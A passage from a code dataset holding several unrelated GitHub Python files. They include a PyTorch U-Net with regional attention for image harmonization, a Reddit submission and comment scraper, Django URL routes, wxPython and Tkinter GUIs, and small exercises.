torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = feature * reverse_mask\n spliced = self.connection(feature) * mask\n return background + spliced \n\n\nclass RegionalAttentionConnect(nn.Module):\n \"\"\"docstring for RegionalAttentionConnect\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnect, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature)* reverse_mask\n spliced_feature = self.connection(feature)\n spliced = self.spliced_attention(spliced_feature) * mask\n return background + spliced \n\nclass RegionalAttentionConnectv2(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectv2\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectv2, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n # selected the feature from the background as the additional feature to masked splicing feature.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature) * reverse_mask\n selected_feature = self.mixed_attention(feature)\n spliced_feature = self.spliced_attention(feature) \n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\nclass RegionalAttentionConnectWithoutMask(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectv2\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectWithoutMask, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n self.mask_attention = SpatialAttentionModule(channel,16)\n self.reverse_mask_attention = SpatialAttentionModule(channel,16)\n\n def forward(self,feature,m):\n _,_,w,_ = feature.size()\n # binaryfiy\n # selected the feature from the background as the additional feature to masked splicing feature.\n \n # here we build the mask by the input feature\n\n mask = self.mask_attention(feature)\n reverse_mask = self.reverse_mask_attention(feature)\n\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature) * reverse_mask\n selected_feature = self.mixed_attention(feature)\n spliced_feature = self.spliced_attention(feature) \n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\n\nclass PreRegionalAttentionConnectv2(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectv2\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(PreRegionalAttentionConnectv2, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n # selected the feature from the background as the additional feature to masked splicing feature.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature * reverse_mask)\n selected_feature = self.mixed_attention(feature * mask)\n spliced_feature = self.spliced_attention(feature * mask) \n spliced = ( self.connection(spliced_feature) + selected_feature )\n return background + spliced \n\n\nclass PreRegionalAttentionConnectADAIN(nn.Module):\n def __init__(self,channel):\n super(PreRegionalAttentionConnectADAIN, self).__init__()\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n # selected the feature from the background as the additional feature to masked splicing feature.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature * reverse_mask)\n selected_feature = self.mixed_attention(feature * mask)\n spliced_feature = self.spliced_attention(feature * mask) \n spliced = ( adaptive_instance_normalization(spliced_feature, background) + selected_feature )\n return background + spliced \n\n\nclass RegionalAttentionConnectv3(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectv3\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectv3, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModuleJustSigmoid(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n # selected the feature from the background as the additional feature to masked splicing feature.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature) * reverse_mask\n choosen_channel = self.spliced_attention(feature)\n spliced_feature = choosen_channel * feature\n selected_feature = (1 - choosen_channel) * feature\n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\n\n\n\nclass RegionalAttentionConnectGaussianMask(nn.Module):\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectGaussianMask, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n self.gaussianMask = GaussianSmoothing(1,5,1)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n # selected the feature from the background as the additional feature to masked splicing feature.\n if w != mw:\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n # here we add gaussin filter to mask and reverse_mask for better harimoization of edges.\n\n mask = self.gaussianMask(F.pad(mask,(2,2,2,2),mode='reflect'))\n reverse_mask = self.gaussianMask(F.pad(reverse_mask,(2,2,2,2),mode='reflect'))\n\n\n background = self.background_attention(feature) * reverse_mask\n selected_feature = self.mixed_attention(feature)\n spliced_feature = self.spliced_attention(feature) \n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\n\n\nclass MinimalUnet(nn.Module):\n \"\"\"docstring for MinimalUnet\"\"\"\n def __init__(self, down=None,up=None,submodule=None,attention=None,withoutskip=False):\n super(MinimalUnet, self).__init__()\n \n self.down = nn.Sequential(*down)\n self.up = nn.Sequential(*up) \n self.sub = submodule\n self.attention = attention\n self.withoutskip = withoutskip\n self.is_attention = not self.attention == None \n self.is_sub = not submodule == None \n\n \n def forward(self,x,mask=None):\n if self.is_sub: \n x_up,_ = self.sub(self.down(x),mask)\n else:\n x_up = self.down(x)\n\n if self.is_attention:\n x = self.attention(x,mask)\n \n if self.withoutskip: #outer or inner.\n x_out = self.up(x_up)\n else:\n x_out = (torch.cat([x,self.up(x_up)],1),mask)\n\n return x_out\n\n \n\n# Defines the submodule with skip connection.\n# X -------------------identity---------------------- X\n# |-- downsampling -- |submodule| -- upsampling --|\nclass UnetSkipConnectionBlock(nn.Module):\n def __init__(self, outer_nc, inner_nc, input_nc=None,\n submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False,is_attention_layer=False,attention_model=RegionalAttentionConnect):\n super(UnetSkipConnectionBlock, self).__init__()\n self.outermost = outermost\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n if input_nc is None:\n input_nc = outer_nc\n downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,\n stride=2, padding=1, bias=use_bias)\n downrelu = nn.LeakyReLU(0.2, True)\n downnorm = norm_layer(inner_nc)\n uprelu = nn.ReLU(True)\n upnorm = norm_layer(outer_nc)\n\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downconv]\n up = [uprelu, upconv]\n model = MinimalUnet(down,up,submodule,withoutskip=outermost)\n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc,\n kernel_size=4, stride=2,\n padding=1, bias=use_bias)\n down = [downrelu, downconv]\n up = [uprelu, upconv, upnorm]\n model = MinimalUnet(down,up)\n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1, bias=use_bias)\n down = [downrelu, downconv, downnorm]\n up = [uprelu, upconv, upnorm]\n\n if is_attention_layer:\n attention_model = attention_model(input_nc)\n else:\n attention_model = None\n if use_dropout:\n model = MinimalUnet(down,up.append(nn.Dropout(0.5)),submodule,attention_model)\n else:\n model = MinimalUnet(down,up,submodule,attention_model)\n\n self.model = model\n\n\n def forward(self, x,mask):\n # build the mask for attention use\n return self.model(x,mask)\n \nclass UnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, num_downs=8, ngf=64,\n norm_layer=nn.BatchNorm2d, use_dropout=False,is_attention_layer=False,attention_model=RegionalAttentionConnect,use_inner_attention=False):\n super(UnetGenerator, self).__init__()\n\n # 8 for 256x256\n # 9 for 512x512\n # construct unet structure\n self.need_mask = not input_nc == output_nc\n\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=None, norm_layer=norm_layer, innermost=True) # 1\n for i in range(num_downs - 5): #3 times\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, input_nc=None, submodule=unet_block, norm_layer=norm_layer, use_dropout=use_dropout,is_attention_layer=use_inner_attention,attention_model=attention_model) # 8,4,2\n unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, input_nc=None, submodule=unet_block, norm_layer=norm_layer,is_attention_layer=is_attention_layer,attention_model=attention_model) #16\n unet_block = UnetSkipConnectionBlock(ngf * 2, ngf * 4, input_nc=None, submodule=unet_block, norm_layer=norm_layer,is_attention_layer=is_attention_layer,attention_model=attention_model) #32\n unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_block, norm_layer=norm_layer,is_attention_layer=is_attention_layer,attention_model=attention_model) #64 \n unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True, norm_layer=norm_layer) # 128\n\n self.model = unet_block\n\n def forward(self, input):\n if self.need_mask:\n return self.model(input,input[:,3:4,:,:])\n else:\n return self.model(input[:,0:3,:,:],input[:,3:4,:,:])","repo_name":"vinthony/s2am","sub_path":"scripts/models/unetseg.py","file_name":"unetseg.py","file_ext":"py","file_size_in_byte":21209,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"73461080760","text":"####################\n### Imports\n####################\n\n## Standard Libary\nimport sys\nimport os\nimport sys\nimport jsonlines\nimport json\nimport gzip\nimport argparse\nfrom time import sleep\nimport logging\n\n## External\nimport pandas as pd\nfrom tqdm import tqdm\n\n## Local\nfrom retriever import Reddit\nfrom retriever.util.helpers import chunks\n\n####################\n### Globals\n####################\n\n## Logging\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger()\n\n## Filter Columns (To Reduce Request Load)\nSUBMISSION_COLS = [\n \"author\",\n \"author_fullname\",\n \"num_comments\",\n \"created_utc\",\n \"id\",\n \"permalink\",\n \"selftext\",\n \"title\",\n \"subreddit\",\n \"subreddit_id\",\n]\n\n\n####################\n### Functions\n####################\n\ndef parse_arguments():\n \"\"\"\n\n Parse command-line to identify configuration filepath.\n Args:\n None\n\n Returns:\n args (argparse Object): Command-line argument holder.\n \"\"\"\n ## Initialize Parser Object\n parser = argparse.ArgumentParser(description=\"Query Reddit Submissions and Comments\")\n ## Generic Arguments\n parser.add_argument(\"subreddit\", type=str, help=\"Name of the subreddit to find submissions and comments for\")\n parser.add_argument(\"--output-dir\", required=True, type=str, help=\"Path to output directory\")\n parser.add_argument(\"--comments-only\", action=\"store_true\",\n help=\"Only query comments from already pulled submissions in --output-dir\")\n parser.add_argument(\"--start-date\", type=str, default=\"2019-01-01\", help=\"Start date for data\")\n parser.add_argument(\"--end-date\", type=str, default=\"2020-08-01\", help=\"End date for data\")\n parser.add_argument(\"--query-freq\", type=str, default=\"7D\", help=\"How to break up the submission query\")\n parser.add_argument(\"--min-comments\", type=int, default=0,\n help=\"Filtering criteria for querying comments based on submissions\")\n parser.add_argument(\"--use-praw\", action=\"store_true\", default=False,\n help=\"Retrieve Official API data objects (at expense of query time) instead of Pushshift.io data\")\n parser.add_argument(\"--chunksize\", type=int, default=50,\n help=\"Number of submissions to query comments from simultaneously\")\n parser.add_argument(\"--sample-percent\", type=float, default=1, help=\"Submission sample percent (0, 1]\")\n parser.add_argument(\"--random-state\", type=int, default=42, help=\"Sample seed for any submission sampling\")\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"Run script in debug mode.\")\n parser.add_argument(\"--log-file\", type=str, help=\"Write log to file instead of standard out (terminal)\")\n parser.add_argument(\"--limit-submission-metadata\", action=\"store_true\",\n help=f\"Limit retrieved submission metadata to {SUBMISSION_COLS}\")\n ## Parse Arguments\n args = parser.parse_args()\n return args\n\n\ndef create_dir(directory):\n \"\"\"Create directory if it does not exist\"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_date_range(start_date,\n end_date,\n query_freq):\n \"\"\"\n\n \"\"\"\n ## Query Date Range\n DATE_RANGE = list(pd.date_range(start_date, end_date, freq=query_freq))\n if len(DATE_RANGE) == 0:\n LOGGER.error(f\"Start, End Date, and Query frequency are not compatible. Or provided end date ({str(end_date)}) is before start date ({str(start_date)})\")\n exit(1)\n if pd.to_datetime(start_date) < DATE_RANGE[0]:\n DATE_RANGE = [pd.to_datetime(start_date)] + DATE_RANGE\n if pd.to_datetime(end_date) > DATE_RANGE[-1]:\n DATE_RANGE = DATE_RANGE + [pd.to_datetime(end_date)]\n DATE_RANGE = [d.date().isoformat() for d in DATE_RANGE]\n return DATE_RANGE\n\n\ndef main():\n \"\"\"Main program\"\"\"\n ## Parse Arguments\n args = parse_arguments()\n\n ## Adjust logging if needed\n if args.debug:\n LOGGER.setLevel(logging.DEBUG)\n if args.log_file:\n LOGGER.addHandler(logging.FileHandler(args.log_file))\n\n ## Initialize Reddit API Wrapper\n reddit = Reddit(init_praw=args.use_praw, logger=LOGGER)\n ## Create Output Directory\n create_dir(args.output_dir)\n ## Get Date Range\n DATE_RANGE = get_date_range(args.start_date,\n args.end_date,\n args.query_freq)\n ## Create Output Directory\n LOGGER.info(f\"\\nStarting Query for r/{args.subreddit}\")\n SUBREDDIT_OUTDIR = f\"{args.output_dir}/{args.subreddit}/\"\n SUBREDDIT_SUBMISSION_OUTDIR = f\"{SUBREDDIT_OUTDIR}submissions/\"\n create_dir(SUBREDDIT_OUTDIR)\n create_dir(SUBREDDIT_SUBMISSION_OUTDIR)\n\n ## Get subreddit info\n meta_file = f\"{SUBREDDIT_OUTDIR}metadata.json.gz\"\n if os.path.exists(meta_file):\n with gzip.open(meta_file, \"rt\") as f:\n meta = json.load(f)\n # Fix date range to not query before subreddit was founded\n created = pd.to_datetime(meta.get(\"created_utc\"))\n if created > pd.to_datetime(args.start_date):\n LOGGER.info(f\"r/{args.subreddit} did not exist until {created}. Changing start date from {args.start_date} to {created}\")\n DATE_RANGE = get_date_range(created,\n args.end_date,\n args.query_freq)\n elif args.use_praw:\n LOGGER.info(f\"Pulling subreddit metadata\")\n meta = reddit.retrieve_subreddit_metadata(args.subreddit)\n meta[\"created_utc\"] = str(pd.to_datetime(meta.get(\"created_utc\"), unit=\"s\"))\n with gzip.open(meta_file, \"wt\") as f:\n json.dump(meta, f)\n\n # Fix date range to not query before subreddit was founded\n created = pd.to_datetime(meta.get(\"created_utc\"))\n if created > pd.to_datetime(args.start_date):\n LOGGER.info(f\"r/{args.subreddit} did not exist until {created}. Changing start date from {args.start_date} to {created}\")\n DATE_RANGE = get_date_range(created,\n args.end_date,\n args.query_freq)\n\n ## Identify Submission Data\n submission_files = []\n if not args.comments_only:\n LOGGER.info(\"Pulling Submissions\")\n submission_counts = 0\n for dstart, dstop in tqdm(list(zip(DATE_RANGE[:-1], DATE_RANGE[1:])), desc=\"Date Range\", file=sys.stdout):\n submission_file = f\"{SUBREDDIT_SUBMISSION_OUTDIR}{dstart}_{dstop}.json.gz\"\n if os.path.exists(submission_file):\n LOGGER.info(f\"Skipping {submission_file} because it already exists.\")\n submission_files.append(submission_file)\n continue\n ## Query Submissions\n subreddit_submissions = reddit.retrieve_subreddit_submissions(args.subreddit,\n start_date=dstart,\n end_date=dstop,\n limit=None,\n cols=SUBMISSION_COLS if args.limit_submission_metadata else None)\n if subreddit_submissions is not None and not subreddit_submissions.empty:\n submission_counts += len(subreddit_submissions)\n subreddit_submissions.to_json(submission_file, orient=\"records\", lines=True, compression=\"gzip\")\n submission_files.append(submission_file)\n\n LOGGER.info(\n \"Found {:,d} submissions. Note this number does not include pre-pulled submissions\".format(submission_counts))\n if submission_counts == 0 and len(submission_files) == 0:\n LOGGER.info(f\"No submissions found from {DATE_RANGE[0]} to {DATE_RANGE[-1]}. Exiting.\")\n sys.exit(0)\n\n ## Pull Comments\n LOGGER.info(\"Pulling Comments\")\n SUBREDDIT_COMMENTS_DIR = f\"{SUBREDDIT_OUTDIR}comments/\"\n _ = create_dir(SUBREDDIT_COMMENTS_DIR)\n if not submission_files:\n submission_files = [f\"{SUBREDDIT_SUBMISSION_OUTDIR}/{p}\" for p in os.listdir(SUBREDDIT_SUBMISSION_OUTDIR)]\n for sub_file in tqdm(submission_files, desc=\"Date Range\", position=0, leave=False, file=sys.stdout):\n subreddit_submissions = pd.read_json(sub_file, lines=True)\n if subreddit_submissions.empty:\n continue\n if args.sample_percent < 1:\n subreddit_submissions = subreddit_submissions.sample(frac=args.sample_percent,\n random_state=args.random_state,\n replace=False).reset_index(drop=True).copy()\n link_ids = subreddit_submissions.loc[subreddit_submissions[\"num_comments\"] > args.min_comments][\"id\"].tolist()\n # Skip submissions where comments were already pulled\n num_total_links = len(link_ids)\n link_ids = [l for l in link_ids if not os.path.exists(f\"{SUBREDDIT_COMMENTS_DIR}{l}.json.gz\")]\n num_processed_links = num_total_links - len(link_ids)\n LOGGER.info(f\"Already processed comments from {num_processed_links} submissions. Skipping those.\")\n if len(link_ids) == 0:\n continue\n link_id_chunks = list(chunks(link_ids, args.chunksize))\n for link_id_chunk in tqdm(link_id_chunks, desc=\"Submission Chunks\", position=1, leave=False, file=sys.stdout):\n link_df = reddit.retrieve_submission_comments(link_id_chunk)\n for link_id in link_id_chunk:\n link_file = f\"{SUBREDDIT_COMMENTS_DIR}{link_id}.json.gz\"\n if link_df is not None and not link_df.empty:\n link_id_df = link_df.loc[link_df[\"link_id\"] == f\"t3_{link_id}\"]\n if not link_id_df.empty:\n link_id_df.to_json(link_file, orient=\"records\", lines=True, compression=\"gzip\")\n\n LOGGER.info(\"Script complete.\")\n\n\n####################\n### Execute\n####################\nif __name__ == \"__main__\":\n main()\n","repo_name":"AADeLucia/retriever","sub_path":"utilities/retrieve_subreddit_data.py","file_name":"retrieve_subreddit_data.py","file_ext":"py","file_size_in_byte":10143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41677688170","text":"# Define filter functions\ndef filterKeywords(articles, keywords, fields, keep=True): #filter for keywords\n filteredArticles = []\n for article in articles:\n if article.checkKeywords(keywords, fields) is keep:\n filteredArticles.append(article)\n \n return(filteredArticles)\n\ndef filterLikes(articles, likeThreshold):\n filteredArticles = []\n for article in articles:\n if int(article.likes) >= int(likeThreshold):\n filteredArticles.append(article)\n \n return filteredArticles","repo_name":"guylaboque/mediumbot","sub_path":"src/mediumcrawler/listfilters.py","file_name":"listfilters.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32425527166","text":"\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('create-for-comment//', views.create_report_comment, name='create_report_comment'),\n path('create-for-project/', views.create_report_project, name='create_report_project'),\n path('show-for-project/', views.show_report_project, name='show_report_project'),\n path('show-for-comment/', views.show_report_comment, name='show_report_comment'),\n path('delete-for-comment/', views.delete_report_comment, name='delete_report_comment'),\n path('delete-for-project/', views.delete_report_project, name='delete_report_project'),\n\n]\n\n\n","repo_name":"ahmedmumdouh/CrowdFundingApp","sub_path":"CrowdFunding/reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25204787128","text":"import wx\nimport models\nfrom datalist import DataList, TerminalList, CircuitList, UltimateCircuitList, OLVCircuitList\nfrom new_circuit import NewCircuitWindow\n\nclass CTSWindow(wx.Frame):\n\tdef __init__(self, parent):\n\t\twx.Frame.__init__(self, parent, title = \"Connector Addition\", size=(640,480))\n\t\tpanel = wx.Panel(self, wx.ID_ANY)\n\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\n\t\thbox1 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tst1 = wx.StaticText(panel, -1, label = \"Connector DWG P/N: \")\n\t\tst1.Wrap(200)\n\t\tself.connector_part_num = wx.TextCtrl(panel)\n\n\t\tst2 = wx.StaticText(panel, -1, label = \"Identified P/N:\")\n\t\tself.identified_part_num = wx.TextCtrl(panel)\n\n\t\thbox1.Add(st1, flag = wx.RIGHT, border = 8)\n\t\thbox1.Add(self.connector_part_num, border = 8, proportion = 1)\n\t\thbox1.Add(st2, border = 8)\n\t\thbox1.Add(self.identified_part_num, border = 8, proportion = 1)\n\n\t\tst3 = wx.StaticText(panel, -1, label = \"Location: \")\n\t\tself.location_tc = wx.TextCtrl(panel)\n\n\t\tst4 = wx.StaticText(panel, -1, label = \"Colour\")\n\t\tself.colour_tc = wx.TextCtrl(panel)\n\n\t\thbox2 = wx.BoxSizer(wx.HORIZONTAL)\n\t\thbox2.Add(st3, flag = wx.RIGHT, border = 8)\n\t\thbox2.Add(self.location_tc, border = 8, proportion = 1)\n\t\thbox2.Add(st4, flag = wx.RIGHT, border = 8)\n\t\thbox2.Add(self.colour_tc, border = 8, proportion = 1)\n\n\t\tself.TerminalList = TerminalList(panel)\n\n\t\tvbox.Add(hbox1, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border = 10)\n\t\tvbox.Add(hbox2, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border = 10)\n\t\tvbox.Add(self.TerminalList, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border = 10)\n\t\tpanel.SetSizer(vbox)\n\t\tself.Show(True)\n\nclass CircuitWindow(wx.Frame):\n\tdef __init__(self, parent):\n\t\twx.Frame.__init__(self, parent, title = \"Circuit Table\", size=(600,800))\n\n\t\tpanel = wx.Panel(self, wx.ID_ANY)\n\t\tvbox = wx.BoxSizer(wx.VERTICAL)\n\t\tself.CircuitList = CircuitList(panel)\n\t\t# self.CircuitList = UltimateCircuitList(self)\n\t\t# self.CircuitList = OLVCircuitList(panel)\n\t\tvbox.Add(self.CircuitList, flag = wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP|wx.BOTTOM, border = 10)\n\t\tpanel.SetSizer(vbox)\n\t\tself.Show(True)\n\nclass MainWindow(wx.Frame):\n\tdef __init__(self, parent, title):\n\n\t\twx.Frame.__init__(self, parent, title = title, size=(600,800))\n\t\tpanel = wx.Panel(self, wx.ID_ANY)\n\t\tself.lb = DataList(panel)\n\t\tself.add_tube()\n\t\tself.Show(True)\n\n\tdef add_tube(self):\n\t\ttheTube = models.Tubes.get(models.Tubes.id == 1)\n\t\tself.lb.Append([theTube.location, '', '', theTube.type \n\t\t\t+ \" \" + theTube.diameter, '', theTube.length])\n\napp = wx.App(False)\nframe = MainWindow(None, \"Hello World\")\nframe2 = NewCircuitWindow(None)\n# frame2 = CTSWindow(None)\nframe3 = CircuitWindow(None)\nprint(models.Tubes.get(models.Tubes.id == 1).diameter)\napp.MainLoop()","repo_name":"saadabbasi/improved-fiesta","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10349321247","text":"import sys\n\ndef input():\n return sys.stdin.readline().rstrip()\n\nN = int(input())\nINF = float('inf')\narr = list(map(int,input().split()))\ndp = [[INF for _ in range(N)] for _ in range(N)]\n\n\nfor left in range(N-1,-1,-1):\n for right in range(left,N):\n if left == right:\n dp[left][right] = 0\n elif left +1 == right and arr[left] == arr[right]:\n dp[left+1][right+1] = 0\n else:\n if arr[left] == arr[right]:\n dp[left][right] = dp[left+1][right-1]\n dp[left][right] = min(dp[left][right] , 1 + min(dp[left+1][right] , dp[left][right-1]))\nprint(dp[0][N-1])","repo_name":"gkgg123/algorithm_2022","sub_path":"1695_팰린드롬_만들기_version2.py","file_name":"1695_팰린드롬_만들기_version2.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22823424215","text":"from freezegun import freeze_time\n\nfrom flowmaster.operators.etl.service import ETLOperator\nfrom tests.fixtures.yandex_metrika import yml_visits_to_csv_config\n\n\n@freeze_time(\"2021-01-01\")\ndef test_jinja_template():\n yml_visits_to_csv_config.name = \"flow\"\n yml_visits_to_csv_config.load.file_name = (\n \"{{name}} {{provider}} {{storage}} {{ datetime.date() }}.tsv\"\n )\n yml_visits_to_csv_config.load.add_data_before = (\n \"{{name}} {{provider}} {{storage}} {{ datetime.date() }}.tsv\"\n )\n yml_visits_to_csv_config.load.add_data_after = (\n \"{{name}} {{provider}} {{storage}} {{ datetime.date() }}.tsv\"\n )\n\n flow = ETLOperator(yml_visits_to_csv_config)\n\n assert flow.Load.file_name == \"flow yandex_metrika_logs csv 2021-01-01.tsv\"\n assert flow.Load.add_data_before == \"flow yandex_metrika_logs csv 2021-01-01.tsv\"\n assert flow.Load.add_data_after == \"flow yandex_metrika_logs csv 2021-01-01.tsv\"\n","repo_name":"TrendingTechnology/FlowMaster","sub_path":"tests/test_loaders/test_csv.py","file_name":"test_csv.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"73629783159","text":"class SlowLog(object):\n\n def __init__(self, command, startTime, executionTime, shardId=None):\n \"\"\"\n :param command: 命令\n :param startTime: 命令开始执行时间(ISO 8601标准的UTC时间,格式为:YYYY-MM-DDTHH:mm:ssZ)\n :param executionTime: 命令执行时长(带单位)\n :param shardId: (Optional) 执行命令的分片id\n \"\"\"\n\n self.command = command\n self.startTime = startTime\n self.executionTime = executionTime\n self.shardId = shardId\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/redis/models/SlowLog.py","file_name":"SlowLog.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"22835268289","text":"#Códgo exibe resultado armazenado em uma variavel e mostra qual o tipo\r\na = 5.\r\nb = 6\r\nc = a + b\r\nprint(c, type(c))\r\n\r\n#Codigo pra realizar soma direta\r\nd = 10 \r\nd += 5\r\nprint(d)\r\n\r\n#para elevar números\r\na = 10**2\r\nprint(a)\r\n\r\n#Número complexo\r\nn_1 = 5 + 1j\r\nn_2 = 6 + 1j\r\nprint(n_1 + n_2)\r\n\r\n#Transforma string em número\r\nstring_n = '123'\r\nn_3 = float(string_n)\r\nsoma = n_3 + n_3\r\nprint(soma)\r\n\r\n\r\n\r\n","repo_name":"iAMgui43/Python","sub_path":"Básico Python/Números.py","file_name":"Números.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42602566507","text":"from tkinter import *\nfrom tkinter import filedialog\n\n#1a2634\n#203e5f\n#eec550\n#f9e3a3\n\nmain = Tk()\nmain.title('Prototype Beta')\nmain.geometry('500x350')\nmain.configure(background='#1a2634')\n\ndef cal():\n\n def submit(value, event):\n print(value)\n cng = str(value)\n print(cng+'lol')\n \n cal = Tk()\n cal.title('Calender')\n cal.geometry('500x350')\n cal.configure(background='#1a2634')\n\n days1 = StringVar(cal)\n days = [\n 'Enter Day',\n 'Saturday',\n 'Sunday',\n 'Monday',\n 'Tuesday',\n 'Wednesday',\n 'Thursday',\n 'Friday'\n ]\n days1.set('Enter Day')\n\n calfr = Frame(cal, bg='#203e5f', height='50', width='50')\n calfr.grid(row=0, column=0, pady=(10,0))\n call = Label(calfr, text='Enter Food And Day', bg='#203e5f')\n cald = OptionMenu(calfr, days1, *days, command=submit(cng, True))\n cal.bind('', submit)\n cale = Entry(calfr, highlightbackground='#203e5f')\n call.grid(row=0, column=0)\n cald.grid(row=1, column=0)\n cale.grid(row=2, column=0)\n\ndef test():\n print('yeet')\n \ntopframe = Frame(main, bg='#eec550',height='30')\ntopframe.grid(row=0, column=0) # make as wide as main\ncan1 = Canvas(topframe,height='20',width='125',bg='#eec550',highlightthickness=0)\ncan1.create_line(0, 5, 20, 5,fill='#203e5f')\ncan1.create_line(0, 10, 20, 10,fill='#203e5f')\ncan1.create_line(0, 15, 20, 